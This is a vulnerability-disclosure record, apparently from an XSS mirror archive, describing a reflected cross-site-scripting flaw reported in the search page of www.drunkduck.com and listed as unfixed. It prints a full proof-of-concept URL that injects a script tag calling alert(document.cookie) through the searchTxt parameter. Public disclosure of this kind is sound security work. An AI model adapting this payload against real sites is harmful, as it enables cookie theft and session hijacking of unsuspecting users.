Security researcher thejanky, has submitted on 21/07/2010 a cross-site-scripting (XSS) vulnerability affecting www.drunkduck.com, which at the time of submission ranked 100377 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 21/07/2010 |
Date published: 13/12/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: thejanky |
Domain: www.drunkduck.com |
Category: XSS |
Pagerank: 100377 |
URL: http://www.drunkduck.com/search.php?searchTxt=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscri pt%3E&browsetype=-1&browsetone=-1&search_style[]=0&search_style[]=1&search_style[]=2&search_style[]= 3&search_style[]=4&search_style[]=5&search_style[]=6&search_style[]=7&search_style[]=8&search_catego ry[]=0&search_category[]=1&search_category[]=2&search_category[]=4&search_category[]=5&search_catego ry[]=6&search_category[]=8&search_category[]=9&search_category[]=12&search_category[]=13&search_cate gory[]=14&search_category[]=15&search_category[]=16&search_category[]=17&search_category[]=18&search _category[]=19&browseupdate=any&browsenum=2&browsenum_low=0&browsenum_high=0&sortby=read&submit=Go! |
Click here to view the mirror
|
|
|